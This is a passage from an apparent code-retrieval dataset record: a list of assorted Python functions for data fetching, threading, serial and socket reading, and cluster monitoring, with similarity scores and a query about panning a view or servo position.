start_at += hits_limit\n time.sleep(THROTTLE)\n print(\"[{}] : fetched {} records to {}.\".format(\n keyword, len(results), filename))\n save_data(results, filename)", "def get_data():\n return", "def getData(tme=currentTime):\n # attempts request 10 times\n for attempt in range(10):\n try:\n # make a request to the url and return it in json format\n url = \"https://api.darksky.net/forecast/%s/%s,%s,%s?exclude=minutely,hourly,daily,alerts,flags\" % (API_KEY, LAT, LNG, tme)\n return get(url).json()\n except:\n # Wait .05 seconds and try again\n sleep(.05)\n pass", "def run(self):\n while self.running:\n self.handle_request()", "def poller():\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n output = loop.run_until_complete(get_results(loop))\n o = open('data.pkl', 'wb')\n\n pickle.dump(output, o)", "def fetch_data(args):\n logger.debug(\"Running the fetch_data function\")\n\n #Loading the config\n with open(os.path.join(\"Config\",\"config.yml\"), \"r\") as f:\n config = yaml.safe_load(f)\n\n #Starting the scraping process\n tstart = datetime.datetime.now()\n err_count = 0\n\n logger.info(\"Starting web scraping now.\")\n for i in range(config[\"fetch_data\"][\"indices\"][\"start\"], config[\"fetch_data\"][\"indices\"][\"end\"]+1):\n try:\n time.sleep(1)\n req_link1 = \"http://www.gutenberg.org/cache/epub/\" + str(i) + \"/pg\" + str(i) + \".txt\"\n response1 = requests.get(req_link1)\n \n req_link2 = \"http://www.gutenberg.org/files/\" + str(i) + \"/\" + str(i) + \"-0.txt\"\n response2 = requests.get(req_link2)\n \n response1.encoding = \"UTF-8\"\n response2.encoding = \"UTF-8\"\n \n if response1.status_code == 200:\n with open(config[\"fetch_data\"][\"save_location\"] + str(i) + \".txt\", \"w\", encoding=\"UTF-8\") as text_file:\n text_file.write(response1.text)\n \n elif response2.status_code == 200:\n with open(config[\"fetch_data\"][\"save_location\"] + str(i) + \".txt\", \"w\", encoding=\"UTF-8\") as text_file:\n text_file.write(response2.text)\n \n else:\n err_count = err_count + 1 \n logger.error(\"Status Code {} returned for index {}\".format(response.status_code, i))\n \n if i % 500 == 0:\n time.sleep(30)\n logger.info(\"At Index {}. Time Elapsed: {}\".format(i, datetime.datetime.now()-tstart)) \n\n except Exception as e:\n logger.error(e)\n \n logger.info(\"Total Errorred documents: {}\".format(err_count))\n logger.info(\"Total Successful documents: {}\".format(config[\"fetch_data\"][\"indices\"][\"end\"] - config[\"fetch_data\"][\"indices\"][\"start\"] + 1 -err_count))\n logger.info(\"Total Time taken: {}\".format(datetime.datetime.now()-tstart))\n\n return", "def _read_thread(self):\r\n\r\n while self._reading and self._serial_object:\r\n if self._serial_object.in_waiting:\r\n try:\r\n (raw_data, parsed_data) = self._ubxreader.read()\r\n # if raw_data:\r\n # print(raw_data)\r\n if parsed_data:\r\n print(parsed_data)\r\n except (\r\n ube.UBXStreamError,\r\n ube.UBXMessageError,\r\n ube.UBXTypeError,\r\n ube.UBXParseError,\r\n ) as err:\r\n print(f\"Something went wrong {err}\")\r\n continue", "def DataServer(data):\n\thttpd, t, baseURL = getServerInThread(data)\n\n\tyield baseURL\n\n\thttpd.shutdown()\n\tt.join(10)", "def startworking():\r\n #In the future have the manager program or from the website implement this arguments to a route\r\n #the program will download the file from the website\r\n global exe_name\r\n global Task_Conditional\r\n task_data = None\r\n while task_data is None:\r\n task_data = recieve_data_from_server(\"get_task\")\r\n if task_data is None:\r\n time.sleep(5)\r\n else:\r\n exe_name = task_data[\"exe_name\"]\r\n print('Working on the task \"{}\"'.format(exe_name))\r\n get_file(exe_name)\r\n Task_Conditional = task_data[\"Task_conditional\"]\r\n print(\"loading\")\r\n t1 = time.time()\r\n task_divider(task_data[\"first_num\"], task_data[\"last_num\"])\r\n t2 = time.time()\r\n print(\"ready {}\".format(t2-t1))", "def cli():\n while True:\n try:\n # Get the whole information on each edge.\n l_edge = list()\n s_rsc = '{}/edge'.format(etcdc.prefix)\n \n try:\n r = etcdc.read(s_rsc, recursive=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n else:\n for child in r.children:\n l_app = list()\n d = ast.literal_eval(child.value)\n # get hosts\n print(PROJECT_ROOT + '/' + d['endpoint'])\n l_hosts = kube_list_node(PROJECT_ROOT + '/' + d['endpoint'])\n d['hosts'] = len(l_hosts)\n d_nodes = dict() # {'name': 'ip', ...}\n for item in l_hosts:\n d_nodes[item.metadata.name] = item.status.addresses[0].address\n # log.debug(d_nodes)\n # get # of tenants and apps\n l_tenants = get_tenant(d['name'])\n d['tenants'] = len(l_tenants)\n d['apps'] = 0\n for e in l_tenants:\n if 'app' in e:\n d['apps'] += len(e['app'])\n \n d['cpu'] = 0\n d['memory'] = 0\n i_total_cores = 0\n i_total_memory = 0\n i_total_storage = 0\n for h in l_hosts:\n i_total_cores += int(h.status.capacity['cpu'])\n i_total_memory += int(h.status.capacity['memory'].\n replace('Ki', ''))\n d['tot_cpu'] = i_total_cores\n d['tot_mem'] = int(i_total_memory / (1024*1024))\n \n # Get loadavg and free mem\n if d['name'] == 'edge1':\n ssh_server = 'harden.iorchard.co.kr'\n elif d['name'] == 'edge2':\n ssh_server = 'durant.iorchard.co.kr'\n RSC = 'ssh -p42544 {} get_rsc.sh'.format(ssh_server)\n (b_res, s_out) = cmd(RSC, 3, False)\n l = s_out.split(\"\\n\")\n d['used_cpu'] = (float(l[0]) + float(l[1]) + float(l[2]))\n avail_mem = (int(l[3]) + int(l[4]) + int(l[5])) / (1024*1024)\n d['used_mem'] = d['tot_mem'] - avail_mem\n d['cpu'] = int(d['used_cpu'] / d['tot_cpu'] * 100)\n d['memory'] = int(d['used_mem'] / d['tot_mem'] * 100)\n # ceph storage\n CEPH = \"kubectl --kubeconfig \" + PROJECT_ROOT + '/' \\\n + d['endpoint'] + \" -n rook-ceph exec -it \" \\\n + \"$(kubectl --kubeconfig \" + PROJECT_ROOT + '/' \\\n + d['endpoint'] + \" -n rook-ceph get po \" \\\n + \"-l app=rook-ceph-tools \" \\\n + \"-o jsonpath='{.items[0].metadata.name}') -- \" \\\n + \"ceph df --format json\"\n (b_res, s_out) = cmd(CEPH, 3, False)\n print(s_out)\n d['status'] = 'Healthy' if b_res else 'Unhealthy'\n d_stor = ast.literal_eval(s_out)\n d['tot_stor'] = int(d_stor['stats']['total_bytes'] / pow(1024, 3))\n d['used_stor'] = int(d_stor['stats']['total_used_bytes'] / pow(1024, 3))\n d['storage'] = int(d['used_stor'] / d['tot_stor'] * 100)\n # Update etcd status\n try:\n s = '{}/edge/{}'.format(etcdc.prefix,\n d['name'])\n # log.debug(d)\n etcdc.write(s, d, prevExist=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n \n # Update app status\n s_app = '{}/app'.format(etcdc.prefix)\n try:\n r_app = etcdc.read(s_app, recursive=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n else:\n for app_child in r_app.children:\n if app_child.value is not None:\n d_app = dict()\n app = ast.literal_eval(app_child.value)\n if app['edge'] == d['name']:\n d_app['name'] = app['name']\n d_app['username'] = GUAC_USER\n d_app['password'] = GUAC_PASS\n # Get catalog info.\n s_cat = '{}/catalog/{}'.format(etcdc.prefix,\n app['catalog'])\n try:\n r_cat = etcdc.read(s_cat)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n else:\n cat = ast.literal_eval(r_cat.value)\n app['cat_type'] = cat['type']\n app['cat_name'] = cat['name']\n app['cat_logo'] = cat['logo']\n # Get app status\n if app['cat_type'] == 'vm':\n # first, look at DataVolume status of app.\n CMD = \"kubectl --kubeconfig \" + PROJECT_ROOT + '/' \\\n + d['endpoint'] + ' get dv ' \\\n + app['name'] \\\n + \" -o jsonpath='{range .status}{.phase},{.progress}{end}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n l_out = s_out.split(',')\n if l_out[0] == 'Succeeded':\n # Get vm status of app\n CMD = \"kubectl --kubeconfig \" + PROJECT_ROOT \\\n + '/' \\\n + d['endpoint'] + ' get vm ' \\\n + app['name'] \\\n + \" -o jsonpath='{.status.ready}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res and s_out == 'true':\n # update app status 'running'.\n app.update({'status': 'running'})\n \n if app['edge'] == d['name']:\n # Get where app is running.\n CMD = \"kubectl --kubeconfig \" \\\n + PROJECT_ROOT + '/' \\\n + d['endpoint'] + ' get vmi ' \\\n + app['name'] \\\n + \" -o jsonpath='{.status.nodeName}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res:\n d_app['hostname'] = d_nodes[s_out]\n # Get nodeport for app.\n CMD = \"kubectl --kubeconfig \" \\\n + PROJECT_ROOT + '/' \\\n + d['endpoint'] + ' get svc ' \\\n + app['name'] \\\n + \" -o jsonpath='{.spec.ports[0].nodePort}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res:\n d_app['port'] = s_out\n else:\n # update app status 'stopped'\n app.update({'status': 'stopped'})\n elif l_out[0] == 'ImportInProgress':\n # update app status 'building' and \n app.update({'status': 'building ({})'.format(l_out[1])})\n elif app['cat_type'] == 'container':\n app.update({'status': 'running'})\n \n try:\n s = '{}/app/{}'.format(etcdc.prefix,\n app['name'])\n # log.debug(app)\n etcdc.write(s, app, prevExist=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n \n if 'port' in d_app:\n l_app.append(d_app)\n # render guac-config.j2 and copy it to guac broker server\n log.debug(l_app)\n template = env.get_template('broker.j2')\n s_out = template.render(l_app=l_app)\n s_tmp = '/tmp/{}.broker'.format(d['name'])\n try:\n with open(s_tmp, 'w') as f:\n f.write(s_out)\n except Exception as e:\n log.error(e)\n else:\n CMD = \"scp \" \\\n + \"-P42544 {} {}\".format(s_tmp, d['broker_ip']) \\\n + \":/etc/guacamole/noauth-config.xml\"\n log.debug(CMD)\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res:\n d_app['port'] = s_out\n \n l_edge.append(d)\n \n # log.debug(l_edge)\n log.debug(l_app)\n \n time.sleep(1)\n except:\n log.error('unknown error')", "def do_GET(self):\n for i in range(0,5):\n \"\"\" gather status update time\"\"\"\n f = open(STATUSTIME, \"rb\")\n try:\n mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)\n last = int(mm.readline())\n mm.seek(0)\n mm.close()\n except ValueError as e:\n print(e.message + str(i) + ' failed to read status time')\n continue\n f.close()\n \"\"\" gather json status \"\"\"\n st = open(STATUSFILE, \"rb\")\n try:\n buf = mmap.mmap(st.fileno(), 0, access=mmap.ACCESS_READ)\n raw = (buf.read(len(buf)))\n #print('reading status ' + hashlib.sha1(raw).hexdigest())\n except ValueError as e:\n print(e.message + str(i) + ' failed to read json status')\n continue\n data = None\n if raw is not None:\n try:\n data = raw\n #data = json.loads(raw)\n except ValueError as e:\n print(e.message + str(i) + ' failed to load json status')\n continue\n \"\"\" all done - exit for loop\"\"\"\n break\n else:\n print('all attempts failed')\n self.send_response(500)\n self.end_headers()\n self.wfile.write('\\n')\n return\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n# message = threading.currentThread().getName() + ' ' + str(last) + ' ' +str(data)\n# message = str(raw)\n message = str(data)\n \n self.wfile.write(message)\n self.wfile.write('\\n')\n return", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "def read_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n addr = yield self.r_in_pipe.get()\r\n # model read latency\r\n #for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read data from memory\r\n if addr in self.mem.keys():\r\n data = self.mem[addr]\r\n else:\r\n print >> sys.stderr, \"ERROR: BRAM read_sm: specified address {} is out of range\".format(addr)\r\n data = None\r\n self.rd_count += 1\r\n # write data back\r\n self.r_out_pipe.put(data)", "def run(self):\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(self.address)\n\n #send dummy data\n sock.sendall(bytes(\"Give me\", \"utf-8\"))\n received = sock.recv(1024)\n while True:\n data = sock.recv(1024)\n if not data: break\n received += data\n lymphocytes = pickle.loads(received)\n self.lymphocytes_setter(lymphocytes)\n except ConnectionRefusedError:\n #Don't bother. May be it's better to add more logic to determine\n #permanent connection errors.\n pass\n finally:\n sock.close()", "def get_data():\n global collecting\n global has_ran\n global tables\n\n output = \"Setting collecting variable to true, should be false: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n # Set collecting variable to lock access to logger\n collecting = True\n\n output = \"Just set collecting variable to true, should be true now: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n\n # 15 minutes = 900 seconds\n FIFTN_MINUTES_N_SECS = 900\n \n output = \"In get_data, about to set threading timer\\n\"\n os.write(log_file, output)\n print(output) \n\n # Set timer to run method again in 15 minutes\n threading.Timer(FIFTN_MINUTES_N_SECS, get_data).start()\n \n output = \"In get_data, about to pull data from logger\\n\"\n os.write(log_file, output)\n print(output) \n\n # Pull data for each table on logger \n for table in tables:\n output = \"Inside table iteration, table is: \" + str(table) + \"\\n\"\n os.write(log_file, output)\n print(output) \n # Get data\n collect_data(table)\n \n output = \"Inside table iteration, Finished pulling data from table \\n\"\n os.write(log_file, output)\n print(output) \n\n # Ensure headers are disabled\n if not has_ran:\n has_ran = True;\n\n output = \"In get_data, finished pulling data from logger\\n\"\n os.write(log_file, output)\n print(output) \n\n output = \"Setting collecting variable to false, should be true: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n\n # Finished collecting, unblock and let data upload to plot.ly\n collecting = False\n\n output = \"Just set collecting variable to false, should be false now: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n\n return 0", "def worker_serial_read(self):\r\n while self.active_flag.is_set():\r\n if not self.data_recieved_flag.is_set() and self.serial_data.in_waiting > 0:\r\n # strtmp=self.serial_data.read_until(b'\\x02\\x01\\x04\\x03\\x06\\x05\\x08\\x07');\r\n strtmp = self.serial_data.read_all()\r\n if (strtmp != b''):\r\n # self.buffer_busy_flag.wait();\r\n self.buffer_busy_flag.clear()\r\n # self.recieved_data=[self.recieved_data,strtmp];\r\n self.recieved_data = strtmp\r\n self.buffer_busy_flag.set()\r\n self.data_recieved_flag.set()\r\n else:\r\n time.sleep(0.001)\r\n\r\n return", "def job():\n send_list = [\n {\n \"city\": \"台北\",\n \"user\": USER2,\n },\n {\n \"city\": \"新北\",\n \"user\": USER1,\n },\n ]\n with ApiClient(configuration) as api_client:\n line_bot_api = MessagingApi(api_client)\n for data in send_list:\n get_today_weather(\n FROM_TASK, line_bot_api, text=data[\"city\"], user_id=data[\"user\"]\n )", "def threadWorker(self):\n while True:\n row = self.queue.get() #get a row of data\n if row is None: #ending criterium\n break\n self.similarityQuestions(row) #the actual working function\n self.queue.task_done() #inform the queue one task is done", "def run(self):\n\t\tself.data_source.connect()\n\t\twhile self.running:\n\t\t\tself.data_source.read()", "def run(self):\n try:\n # connect method implementation should return a TaskInfo object\n info = self.connect()\n except:\n # if an error has occurred create a TaskHeadError object\n info = TaskHeadError(self.url.host, 0)\n finally:\n self.data_queue.put(info) # put the result in the queue\n self.ready.set() # and mark the thread as completed", "async def get_data(self, endpoint):\n try:\n with async_timeout.timeout(5, loop=self._loop):\n response = await self._session.get(f\"{endpoint}\")\n\n _LOGGER.debug(\"Response from Dingz device: %s\", response.status)\n self.data = await response.json()\n _LOGGER.debug(self.data)\n except (asyncio.TimeoutError, aiohttp.ClientError):\n _LOGGER.error(\"Can not load data from Dingz device\")\n self.data = None\n raise exceptions.DingzConnectionError()", "async def _read(self):\n try:\n logger.debug('Enter Task._read for %s', self.url)\n while self.websocket:\n await self._read_once()\n except Exception:\n logger.exception('Unhandled exception in Task._read for %s', self.url)\n finally:\n logger.debug('Exit Task._read for %s', self.url)", "def run(self):\n self.read_from_serial()", "def _fetch_data(self, samples):\n pass", "def get_data_sync(self, out_format: str='json', chk_interval=0.25, max_chks=65535):\n if self.data:\n return self.data\n check_cnt = 0\n while True:\n if check_cnt >= max_chks:\n break\n self.data_ready = self.check_available()\n if self.data_ready:\n break\n else:\n check_cnt += 1\n sleep(chk_interval)\n if not self.data_ready:\n raise DataNotReady(\"The run {} has not yet finished, data not available yet.\".format(self))\n resp = self.ph.conn.request(\n 'GET', self.ph.URLS['getdata'].format(self.run_token), dict(api_key=self.ph.api_key, format=out_format))\n data = resp.data.decode('utf-8')\n self.data = self.parse_json_data(data)\n return self.data", "def await_data(self):\n self.data.append(self.socket.recv(1))", "async def _main(self):\n while True:\n time.sleep(1)", "def do_work(self):", "async def async_update(self):\n try:\n self._data = requests.get(self._build_url(), timeout=10, headers={'accept-encoding': None}).json()\n _LOGGER.debug(\"TOON fetched data = %s\", self._data)\n except (requests.exceptions.RequestException) as error:\n _LOGGER.error(\"Unable to connect to TOON: %s\", error)\n self._data = None", "def run(self):\n while True:\n msg = self.recv()", "def fetch(self):\n \n self.genre=\"Review\"\n \n try:\n self.parent_uri = self.currenturi\n \n self.total_threads_count = 0\n self.last_timestamp = datetime( 1980,1,1 )\n if tg.config.get(path='Connector',key='collegenet_max_threads_to_process'):\n self.max_threads_count = int(tg.config.get(path='Connector',key='collegenet_max_threads_to_process'))\n else:\n self.max_threads_count = None\n \n self.collegenetTimelag_max = tg.config.get(path='Connector', key='collegenet_search_timeLag_max')\n self.collegenetTimelag_min = tg.config.get(path='Connector', key='collegenet_search_timeLag_min')\n log.info(self.log_msg('Time Logs :::::::'))\n log.info(self.collegenetTimelag_max)\n log.info(self.collegenetTimelag_min)\n \n## if self.collegenetTimelag_min and self.collegenetTimelag_max:\n## randomTimeLag = random.randint(self.collegenetTimelag_min,self.collegenetTimelag_max) / 1000.0000\n## log.info('sleeping for %s seconds between requests'%randomTimeLag)\n## time.sleep(randomTimeLag)\n \n if not self.__setSoup():\n log.exception(self.log_msg('Soup not set ..... '))\n return False\n \n #post_no = 0 #Remove\n while True:\n #if post_no==3: #Remove\n # break #Remove\n #post_no = post_no + 1 #Remove\n \n currenturi = self.currenturi\n if not self.__addPosts():\n break \n #Get \"post\" information\n #break #Remove\n self.currenturi = currenturi\n if self.collegenetTimelag_min and self.collegenetTimelag_max:\n randomTimeLag = random.randint(self.collegenetTimelag_min,self.collegenetTimelag_max) / 1000.0000\n log.info('sleeping for %s seconds between requests'%randomTimeLag)\n time.sleep(randomTimeLag)\n #We need to set soup again as addPosts() method is changing self.currenturi and self.soup\n if not self.__setSoup():\n log.info(self.log_msg('Soup not set.... break while loop.'))\n break\n \n try:\n next_uri = baseuri + self.soup.find('div',id='search_results_controls').find('a',text=re.compile('&gt;')) \\\n .parent['href']\n self.currenturi = next_uri\n log.info(self.log_msg('Next URI :::::::;'))\n log.info(next_uri)\n except:\n log.exception(self.log_msg('Next Post link not found'))\n break\n \n## if self.collegenetTimelag_min and self.collegenetTimelag_max:\n## randomTimeLag = random.randint(self.collegenetTimelag_min,self.collegenetTimelag_max) / 1000.0000\n## log.info('sleeping for %s seconds between requests'%randomTimeLag)\n## time.sleep(randomTimeLag)\n \n if not self.__setSoup():\n log.info(self.log_msg('Soup not set.... break while loop.'))\n break\n \n return True\n \n except:\n log.exception(self.log_msg('Exception in fetch'))\n return False", "def run(self):\n while True:\n try:\n if not self._read_new_entries(False):\n time.sleep(0.1)\n self._update_all_tasks()\n except KeyboardInterrupt:\n break", "def thread_function():\n while True:\n try:\n s.sanitization()\n try:\n t.yeast_temp()\n try:\n w.read_weight_grains()\n try:\n w.read_weight_hops()\n try:\n QualityCheck_Prep.QualityCheck.get_QA_Check(request_number)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n break", "def run(self):\n data = b'' # data buffer\n try:\n sock = self.conn.transfercmd('RETR ' + self.url.filename, self.offset)\n # loop while received data size is less than block size\n # however the last block could be lesser than that size\n while len(data) < self.block_size:\n if self.cancelled.is_set(): # if the thread has been cancelled\n # stop the thread, the TaskError would not be processed\n # because a loop in the main thread already broken\n raise Exception\n # get data, but not more than fragment size\n # and the size remaining to full block\n data_fragment = sock.recv(min(self.block_size - len(data), self.FRAGMENT_SIZE))\n if not data_fragment: # if there is no data - error\n raise MirrorError\n data += data_fragment # add data to the buffer\n info = TaskProgress(self.url.host, 206, len(data))\n self.data_queue.put(info)\n # if reached the end of the file - exit loop\n if self.file_size - self.offset - len(data) <= 0:\n break\n # when the downloading loop finished, create TaskData object\n info = TaskData(self.url.host, 206, self.offset, data)\n sock.close()\n except:\n # if an error has occurred - create a TaskError object\n info = TaskError(self.url.host, 0, self.offset)\n finally:\n self.conn.close()\n self.data_queue.put(info) # put result TaskInfo object into the queue\n self.ready.set() # mark the thread as comleted", "def receiver(): \n global data\n DW1000.newReceive()\n DW1000.receivePermanently()\n DW1000.startReceive()", "def test_get(self):\n # Start sampling\n self.driver.start_sampling()\n\n self.clear_async_data()\n self.create_sample_data_set_dir(\n \"node59p1_step1.dat\",\n TELEM_DIR,\n \"node59p1.dat\",\n copy_metadata=False\n )\n self.assert_data((DostadParserTelemeteredDataParticle, DostadParserTelemeteredMetadataDataParticle),\n 'test_data_1.txt.result.yml', count=2, timeout=10)\n\n # there is only one file we read from, this example 'appends' data to\n # the end of the node59p1.dat file, and the data from the new append\n # is returned (not including the original data from _step1)\n self.clear_async_data()\n self.create_sample_data_set_dir(\n \"node59p1_step2.dat\",\n TELEM_DIR,\n \"node59p1.dat\",\n copy_metadata=False\n )\n self.assert_data(DostadParserTelemeteredDataParticle, 'test_data_2.txt.result.yml',\n count=1)\n\n # now 'appends' the rest of the data and just check if we get the right number\n self.clear_async_data()\n self.create_sample_data_set_dir(\n \"node59p1_step4.dat\",\n TELEM_DIR,\n \"node59p1.dat\",\n copy_metadata=False\n )\n self.assert_data(DostadParserTelemeteredDataParticle, count=4)", "async def run(self) -> None:", "async def run(self) -> None:", "def threadget(self, url, *args):\n\n self.logger.debug(\"Starting a thread to simulate a GET request to %s\" % url)\n api_get = threading.Thread(target=self.get, args=(url, *args,))\n api_get.start()", "def read_thread(thread_num):\n pass# TODO", "def testInThread(self):\n\n self.collectSensorData()\n self.moveHome()\n self.requestGrasp()\n result = self.waitForGenerateGraspsResult()\n graspFound = self.processGenerateGraspsResult(result)\n return graspFound", "def run(self):\n\n if self.transport == 'any':\n devs = kromek.discover()\n else:\n devs = kromek.discover(self.transport)\n\n print('Discovered %s' % devs)\n\n if len(devs) <= 0:\n return\n\n filtered = []\n\n for dev in devs:\n if self.device == 'all' or dev[0] in self.device:\n filtered.append(dev)\n\n devs = filtered\n if len(devs) <= 0:\n return\n\n done_devices = set()\n try:\n while self.running:\n print(\"Plot_manager.run: getting data\")\n with kromek.Controller(devs, self.interval) as controller:\n for reading in controller.read():\n if self.create_structures:\n self.total = np.array(reading[4])\n self.lst = np.array([reading[4]])\n self.create_structures = False\n else:\n self.total += np.array(reading[4])\n self.lst = np.concatenate(\n (self.lst, [np.array(reading[4])]))\n serial = reading[0]\n dev_count = reading[1]\n if serial not in done_devices:\n this_start, this_end = self.get_interval(\n time.time() - self.interval)\n\n self.handle_spectra(\n this_start, this_end, reading[4])\n if dev_count >= self.count > 0:\n done_devices.add(serial)\n controller.stop_collector(serial)\n if len(done_devices) >= len(devs):\n break\n except KeyboardInterrupt:\n self.vprint(1, '\\nKeyboardInterrupt: stopping Manager run')\n self.takedown()\n except SystemExit:\n self.vprint(1, '\\nSystemExit: taking down Manager')\n self.takedown()", "def _readloop(self):\r\n\r\n while self._ll_alive:\r\n with self._rx_lock:\r\n data = self._Random(1)\r\n if len(data) != 0: # check for timeout\r\n self._uart_rx_queue.put(data)", "async def run():\n while(1):\n # timeout < 1 seems not very stable on my system\n d = await scanner.find_device_by_address(\"C0:98:E5:49:53:54\", timeout=2)\n if not d:\n # Device not found,\n continue\n if ('manufacturer_data' not in d.metadata) or \\\n (d.metadata['manufacturer_data'] is None) or \\\n (736 not in d.metadata['manufacturer_data']):\n print(\"Corrupted data %s ...\" % d.metadata)\n continue\n # This is the mfg data (without the leading 2-byte mfg id)\n # No idea what is 736\n return d.metadata['manufacturer_data'][736]", "def output_thread():\n global gRunning\n\n try:\n while gRunning:\n try:\n inference_result, user_data = gGraph.GetResult()\n \n print (postprocess(inference_result))\n #print(user_data)\n # gUpdateq.put((postprocess(inference_result), user_data))\n\n \n except KeyError:\n # This error occurs when GetResult can't access the user param from the graph, we're just ignoring it for now\n print(\"KeyError\")\n pass\n except Exception as e:\n print(e)\n pass\n print(\"Output thread terminating\")", "def init_data(request):\n if request.method == 'POST':\n data = request.data\n key_word=data[\"key_word\"]\n n_threads = 1\n for thread in range(1, n_threads + 1):\n task_scrapy_jobs.delay(key_word, thread, n_threads)\n return Response(data={\"key_word\":key_word},status=status.HTTP_200_OK)" ]
[ "0.696191", "0.6716008", "0.65941787", "0.6481667", "0.6426779", "0.6374192", "0.62645483", "0.61824685", "0.610256", "0.60537034", "0.60457593", "0.60247904", "0.5971915", "0.59577423", "0.5926537", "0.59190476", "0.58765227", "0.5859717", "0.5845389", "0.58351386", "0.5819517", "0.581063", "0.580608", "0.5793419", "0.5767907", "0.576631", "0.576184", "0.5757008", "0.5757008", "0.5757008", "0.57562435", "0.5745119", "0.5744662", "0.572531", "0.5721983", "0.5710158", "0.56994456", "0.56859547", "0.56839055", "0.5675979", "0.56734204", "0.56665224", "0.56643593", "0.56624216", "0.5645447", "0.5639175", "0.5636106", "0.56267935", "0.56221986", "0.56212574", "0.56160825", "0.5609989", "0.5609094", "0.5603139", "0.5602717", "0.5600033", "0.55900675", "0.55898756", "0.5586539", "0.55832887", "0.55800134", "0.5576575", "0.5570857", "0.55690426", "0.5566242", "0.5561607", "0.5554038", "0.5549329", "0.55335283", "0.55331993", "0.5529088", "0.5527612", "0.5527447", "0.5506676", "0.5503375", "0.55031544", "0.5501448", "0.55010414", "0.5496789", "0.54950786", "0.5487357", "0.5486648", "0.5484855", "0.5484249", "0.5484076", "0.54815906", "0.54733175", "0.54713976", "0.5468115", "0.54653174", "0.5464705", "0.5462504", "0.5462504", "0.54612297", "0.5456765", "0.5456166", "0.5450522", "0.5438045", "0.54356974", "0.54302627", "0.5426204" ]
0.0
-1
Change the position of the pan
def set_position(self, node_uuid, index, data): try: servox = self._bus.nodeman.find_node('servox') servoy = self._bus.nodeman.find_node('servoy') logger.debug('[%s] - set_position of servos %s and %s', self.__class__.__name__, servox, servoy) if data is None or data=="-1|-1": sx,sy = self.values['initial'].get_data_index(index=index).split('|') else: sx,sy = data.split('|') logger.debug('[%s] - set_position to data %s|%s', self.__class__.__name__, sx, sy) datax = "%s|%s|%s"%(sx, self.values['angle_minx'].get_data_index(index=index), self.values['angle_maxx'].get_data_index(index=index)) datay = "%s|%s|%s"%(sy, self.values['angle_miny'].get_data_index(index=index), self.values['angle_maxy'].get_data_index(index=index) ) servox.values['angle'].data = datax servoy.values['angle'].data = datay self.values['position']._data = data except Exception: logger.exception('[%s] - Exception when set_position', self.__class__.__name__)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def panTo(self, p=None):\n if p == None:\n p = self.focus\n MV = self.MV\n vr = self.getViewRight()\n vu = self.getViewUp()\n p = -p\n x = np.dot(p, vr) # dot product\n y = np.dot(p, vu)\n MV[3, :2] = x, y # set first two entries of 4th row to x, y\n self.MV = MV", "def panTo(self, p=None):\n if p == None:\n p = self.focus\n MV = self.MV\n vr = self.getViewRight()\n vu = self.getViewUp()\n p = -p\n x = np.dot(p, vr) # dot product\n y = np.dot(p, vu)\n MV[3, :2] = x, y # set first two entries of 4th row to x, y\n self.MV = MV", "def pan(self, parameter):\n self.tx += parameter[0] / self.sx\n self.ty += parameter[1] / self.sy", "def test_pan():\n _c = _a.copy()\n _c = _c.piv.pan(1.0, -1.0) # note the use of .piv.\n assert np.allclose(_c.coords[\"x\"][0], 1.312480)\n assert np.allclose(_c.coords[\"y\"][0], -1.31248)", "def do_pan_view(self, dx, dy):\n auto = self.autoReplot()\n self.setAutoReplot(False)\n axes_to_update = self.get_axes_to_update(dx, dy)\n axis_ids_horizontal = (self.get_axis_id(\"bottom\"), self.get_axis_id(\"top\"))\n axis_ids_vertical = (self.get_axis_id(\"left\"), self.get_axis_id(\"right\"))\n\n for (x1, x0, _start, _width), axis_id in axes_to_update:\n lbound, hbound = self.get_axis_limits(axis_id)\n i_lbound = self.transform(axis_id, lbound)\n i_hbound = self.transform(axis_id, hbound)\n delta = x1 - x0\n vmin = self.invTransform(axis_id, i_lbound - delta)\n vmax = self.invTransform(axis_id, i_hbound - delta)\n # patch for not \"panning out\"\n if axis_id in axis_ids_horizontal:\n vmin = max(vmin, self.peakmap_range[0])\n vmax = min(vmax, self.peakmap_range[1])\n elif axis_id in axis_ids_vertical:\n vmin = max(vmin, self.peakmap_range[2])\n vmax = min(vmax, self.peakmap_range[3])\n self.set_axis_limits(axis_id, vmin, vmax)\n\n self.setAutoReplot(auto)\n # the signal MUST be emitted after replot, otherwise\n # we receiver won't see the new bounds (don't know why?)\n self.replot()\n self.emit(SIG_PLOT_AXIS_CHANGED, self)", "def OnMove(self, event): # ANDY PAN\n if event.ShiftDown():\n event.Skip()\n return\n\n # for windows, set focus onto pyslip window\n # linux seems to do this automatically\n if sys.platform == \"win32\" and self.FindFocus() != self:\n self.SetFocus()\n\n # get current mouse position\n (x, y) = event.GetPosition()\n # from common.architecture_support import whoscalling2\n # dbg(whoscalling2())\n\n # self.RaiseMousePositionEvent((x, y))\n\n if event.Dragging() and event.LeftIsDown():\n # are we doing box select?\n if not self.last_drag_x is None:\n # no, just a map drag\n self.was_dragging = True\n dx = self.last_drag_x - x\n dy = self.last_drag_y - y\n\n 